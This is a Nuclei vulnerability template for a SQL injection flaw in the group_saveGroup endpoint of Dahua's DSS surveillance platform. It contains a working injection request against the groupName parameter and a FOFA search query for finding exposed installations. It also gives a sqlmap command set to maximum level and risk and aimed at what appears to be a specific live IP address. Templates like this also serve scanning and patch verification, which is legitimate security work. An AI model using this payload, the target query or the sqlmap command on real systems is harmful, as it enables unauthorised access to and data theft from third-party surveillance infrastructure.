id: dahua-dss-groupName-sqli

info:
  name: 大华 DSS 城市安防监控系统 group_saveGroup - SQL 注入漏洞
  author: leadlife
  severity: high
  reference: 
    - https://github.com/wy876/POC/blob/02ac90075317fcc0cacfb84ea681079b0892a174/%E5%A4%A7%E5%8D%8EDSS%E7%B3%BB%E7%BB%9Fgroup_saveGroup%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: body="/portal/include/script/dahuaDefined/headCommon.js?type=index" && title="DSS" || app="dahua-DSS"
    sqlmap: sqlmap -u "http://178.242.37.232:8095/emap/group_saveGroup?groupName=1&groupDesc=1" -p groupName --batch --level 5 --risk 3
  tags: dahua,sqli,iot,dss


http:
  - raw:
      - |
        GET /emap/group_saveGroup?groupName=1'%20and%202333=2333%20and%20'hami'='hami&groupDesc=1 HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: identity
        Accept-Language: zh-CN,zh;q=0.8
        Accept: */*
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
        Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
        Connection: keep-alive
        Cache-Control: max-age=0

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body,'预案名称已存在')
        condition: and
